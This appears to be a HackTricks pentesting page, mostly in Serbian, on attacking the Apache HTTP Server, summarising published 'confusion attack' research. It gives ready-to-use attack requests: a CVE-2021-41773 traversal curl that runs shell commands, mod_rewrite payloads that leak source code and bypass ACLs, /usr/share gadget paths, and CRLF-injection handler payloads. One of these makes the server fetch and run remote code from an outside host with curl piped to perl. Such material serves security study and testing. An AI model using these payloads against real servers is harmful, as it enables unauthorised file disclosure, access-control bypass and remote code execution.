# Apache
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Izvršne PHP ekstenzije
Proverite koje ekstenzije izvršava Apache server. Da biste ih pretražili, možete izvršiti:
```bash
grep -R -B1 "httpd-php" /etc/apache2
```
Takođe, neka mesta gde možete pronaći ovu konfiguraciju su:
```bash
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
```
## CVE-2021-41773
{% code overflow="wrap" %}
```bash
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
```
{% endcode %}
## Confusion Attack
Ove vrste napada su predstavljene i dokumentovane [**od strane Orange u ovom blog postu**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) i sledeći je sažetak. Napad "confusion" u suštini zloupotrebljava način na koji desetine modula koji rade zajedno na kreiranju Apache-a ne rade savršeno sinkronizovano, a modifikacija nekih od njih može izazvati ranjivost u kasnijem modulu.
### Filename Confusion
#### Truncation
**`mod_rewrite`** će skratiti sadržaj `r->filename` nakon karaktera `?` ([_**modules/mappers/mod\_rewrite.c#L4141**_](https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod\_rewrite.c#L4141)). Ovo nije potpuno pogrešno jer će većina modula tretirati `r->filename` kao URL. Međutim, u drugim prilikama ovo će biti tretirano kao putanja do fajla, što bi moglo izazvati problem.
* **Path Truncation**
Moguće je zloupotrebiti `mod_rewrite` kao u sledećem primeru pravila da bi se pristupilo drugim fajlovima unutar fajl sistema, uklanjajući poslednji deo očekivane putanje jednostavno dodajući `?`:
```bash
RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"
# Expected
curl http://server/user/orange
# the output of file `/var/user/orange/profile.yml`
# Attack
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`
```
* **Zavaravajuća dodela RewriteFlag**
U sledećem pravilu preusmeravanja, sve dok URL završava sa .php, biće tretiran i izvršen kao php. Stoga, moguće je poslati URL koji se završava sa .php nakon `?` karaktera dok se u putanji učitava drugačija vrsta datoteke (poput slike) sa zloćudnim php kodom unutar nje:
```bash
RewriteEngine On
RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
# Attacker uploads a gif file with some php code
curl http://server/upload/1.gif
# GIF89a
# Make the server execute the php code
curl http://server/upload/1.gif%3fooo.php
# GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
#### **ACL Bypass**
Moguće je pristupiti datotekama kojima korisnik ne bi trebao imati pristup, čak i ako bi pristup trebao biti odbijen sa konfiguracijama kao što su:
```xml
AuthType Basic
AuthName "Admin Panel"
AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
```
Ovo je zato što će PHP-FPM po defaultu primati URL-ove koji se završavaju sa `.php`, kao što je `http://server/admin.php%3Fooo.php`, i zato što će PHP-FPM ukloniti sve nakon karaktera `?`, prethodni URL će omogućiti učitavanje `/admin.php` čak i ako je prethodno pravilo to zabranilo.
### DocumentRoot Confusion
```bash
DocumentRoot /var/www/html
RewriteRule ^/html/(.*)$ /$1.html
```
Zanimljiva činjenica o Apache-u je da prethodni prepravak pokušava da pristupi datoteci i iz documentRoot-a i iz root-a. Dakle, zahtev za `https://server/abouth.html` će proveriti datoteku u `/var/www/html/about.html` i `/about.html` u datotečnom sistemu. Što se u suštini može zloupotrebiti za pristup datotekama u datotečnom sistemu.
#### **Otkrivanje Izvora Koda na Serveru**
* **Otkrivanje CGI Izvora Koda**
Samo dodavanje %3F na kraju je dovoljno da se otkrije izvorni kod cgi modula:
```bash
curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi
curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
# #!/usr/bin/perl
# use CGI;
# ...
# # the source code of download.cgi
```
* **Otkrivanje PHP Izvornog Koda**
Ako server ima različite domene, pri čemu je jedna od njih statična domena, to se može iskoristiti za pretraživanje datotečnog sistema i otkrivanje php koda:
```bash
# Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
# the source code of config.php
```
#### **Manipulacija lokalnim uređajima**
Glavni problem sa prethodnim napadom je to što će po defaultu većina pristupa preko datotečnog sistema biti odbijena kao u [konfiguracionom šablonu](https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115) Apache HTTP Server-a:
```xml
AllowOverride None
Require all denied
```
Međutim, [Debian/Ubuntu](https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L165) operativni sistemi po defaultu dozvoljavaju `/usr/share`:
```xml
AllowOverride None
Require all granted
```
Zato, bilo bi moguće **zloupotrebiti datoteke smeštene unutar `/usr/share` u ovim distribucijama.**
**Lokalni Gadget za Otkriće Informacija**
* **Apache HTTP Server** sa **websocketd** može izložiti **dump-env.php** skriptu na **/usr/share/doc/websocketd/examples/php/**, koja može otkriti osetljive promenljive okruženja.
* Serveri sa **Nginx** ili **Jetty** mogu izložiti osetljive informacije o web aplikacijama (npr., **web.xml**) kroz svoje podrazumevane web korene smeštene pod **/usr/share**:
* **/usr/share/nginx/html/**
* **/usr/share/jetty9/etc/**
* **/usr/share/jetty9/webapps/**
**Lokalni Gadget za XSS**
* Na Ubuntu Desktop-u sa **instaliranim LibreOffice**, iskorišćavanje funkcije promene jezika u pomoćnim datotekama može dovesti do **Cross-Site Scripting (XSS)**. Manipulacija URL-om na **/usr/share/libreoffice/help/help.html** može preusmeriti na zlonamerne stranice ili starije verzije putem **unsafe RewriteRule**.
**Lokalni Gadget za LFI**
* Ako su instalirani PHP ili određeni front-end paketi poput **JpGraph** ili **jQuery-jFeed**, njihove datoteke mogu biti iskorišćene za čitanje osetljivih datoteka kao što je **/etc/passwd**:
* **/usr/share/doc/libphp-jpgraph-examples/examples/show-source.php**
* **/usr/share/javascript/jquery-jfeed/proxy.php**
* **/usr/share/moodle/mod/assignment/type/wims/getcsv.php**
**Lokalni Gadget za SSRF**
* Korišćenjem **MagpieRSS's magpie\_debug.php** na **/usr/share/php/magpierss/scripts/magpie\_debug.php**, može se lako stvoriti SSRF ranjivost, pružajući prolaz za dalja iskorišćavanja.
**Lokalni Gadget za RCE**
* Mogućnosti za **Remote Code Execution (RCE)** su velike, sa ranjivim instalacijama poput zastare **PHPUnit** ili **phpLiteAdmin**. Ove se mogu iskoristiti za izvršavanje proizvoljnog koda, pokazujući opsežan potencijal manipulacije lokalnim gadgetima.
#### **Jailbreak iz Lokalnih Gadgeta**
Takođe je moguće jailbreak-ovati iz dozvoljenih foldera prateći symlinkove generisane instaliranim softverom u tim folderima, kao što su:
* **Cacti Log**: `/usr/share/cacti/site/` -> `/var/log/cacti/`
* **Solr Data**: `/usr/share/solr/data/` -> `/var/lib/solr/data`
* **Solr Config**: `/usr/share/solr/conf/` -> `/etc/solr/conf/`
* **MediaWiki Config**: `/usr/share/mediawiki/config/` -> `/var/lib/mediawiki/config/`
* **SimpleSAMLphp Config**: `/usr/share/simplesamlphp/config/` -> `/etc/simplesamlphp/`
Pored toga, zloupotrebom symlinkova bilo je moguće dobiti **RCE u Redmine-u.**
### Confuzija Handler-a
Ovaj napad koristi preklapanje funkcionalnosti između `AddHandler` i `AddType` direktiva, koje se obe mogu koristiti za **omogućavanje PHP obrade**. Prvobitno, ove direktive su uticale na različita polja (`r->handler` i `r->content_type` respektivno) u unutrašnjoj strukturi servera. Međutim, zbog nasleđenog koda, Apache obrađuje ove direktive naizmenično pod određenim uslovima, pretvarajući `r->content_type` u `r->handler` ako je prvi postavljen, a drugi nije.
Pored toga, u Apache HTTP Server-u (`server/config.c#L420`), ako je `r->handler` prazan pre izvršavanja `ap_run_handler()`, server **koristi `r->content_type` kao handler**, efektivno čineći `AddType` i `AddHandler` identičnim u efektu.
#### **Prepisivanje Handler-a za Otkriće PHP Izvornog Koda**
U [**ovoj prezentaciji**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013\_dmitriev-maksim.pdf), predstavljena je ranjivost gde netačan `Content-Length` poslat od strane klijenta može uzrokovati da Apache greškom **vrati PHP izvorni kod**. To je bilo zbog problema sa obradom grešaka sa ModSecurity i Apache Portable Runtime (APR), gde dvostruki odgovor dovodi do prepisivanja `r->content_type` na `text/html`.\
Zato što ModSecurity ne obrađuje pravilno povratne vrednosti, vraća PHP kod i ne interpretira ga.
#### **Prepisivanje Handler-a za XXXX**
TODO: Orange još nije otkrio ovu ranjivost
### **Pozivanje Proizvoljnih Handler-a**
Ako napadač može da kontroliše **`Content-Type`** zaglavlje u odgovoru servera, moći će da **pozove proizvoljne module handler-a**. Međutim, do trenutka kada napadač kontroliše ovo, većina procesa zahteva će biti završena. Ipak, moguće je **ponovo pokrenuti proces zahteva zloupotrebom `Location` zaglavlja** jer ako je **r**eturned `Status` 200 i `Location` zaglavlje počinje sa `/`, odgovor se tretira kao Server-Side Redirection i treba ga obraditi.
Prema [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (specifikacija o CGI) u [Sekciji 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) definiše se ponašanje lokalnog preusmeravanja odgovora:
> CGI skripta može vratiti URI putanju i upitni niz (‘local-pathquery’) za lokalni resurs u zaglavlju Location. Ovo ukazuje serveru da treba ponovo obraditi zahtev koristeći specificiranu putanju.
Zato, za izvođenje ovog napada potrebna je jedna od sledećih ranjivosti:
* CRLF Injection u CGI odgovorima zaglavlja
* SSRF sa potpunom kontrolom nad odgovorima zaglavlja
#### **Proizvoljni Handler za Otkriće Informacija**
Na primer, `/server-status` bi trebao biti dostupan samo lokalno:
```xml
SetHandler server-status
Require local
```
Moguće je pristupiti tome postavljanjem `Content-Type` na `server-status` i zaglavlja Location koje počinje sa `/`
```
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a
```
#### **Arbitrarni Handler za Potpun SSRF**
Preusmeravanje na `mod_proxy` za pristup bilo kojem protokolu na bilo kojoj URL adresi:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:
http://example.com/%3F
%0d%0a
%0d%0a
```
Međutim, `X-Forwarded-For` zaglavlje je dodato kako bi se sprečio pristup krajnjim tačkama metapodataka u oblaku.
#### **Arbitrarni Handler za Pristup Lokalnom Unix Domen Socketu**
Pristupite lokalnom Unix Domen Socketu PHP-FPM-a da biste izvršili PHP backdoor smešten u `/tmp/`:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a
```
#### **Arbitrarni Handler za RCE**
Službeni [PHP Docker](https://hub.docker.com/\_/php) imidž uključuje PEAR (`Pearcmd.php`), alat za upravljanje PHP paketima putem komandne linije, koji se može zloupotrebiti za dobijanje RCE:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
orange.tw/x|perl
) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a
```
Check [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), written by [Phith0n](https://x.com/phithon\_xg) for the details of this technique.
## References
* [https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}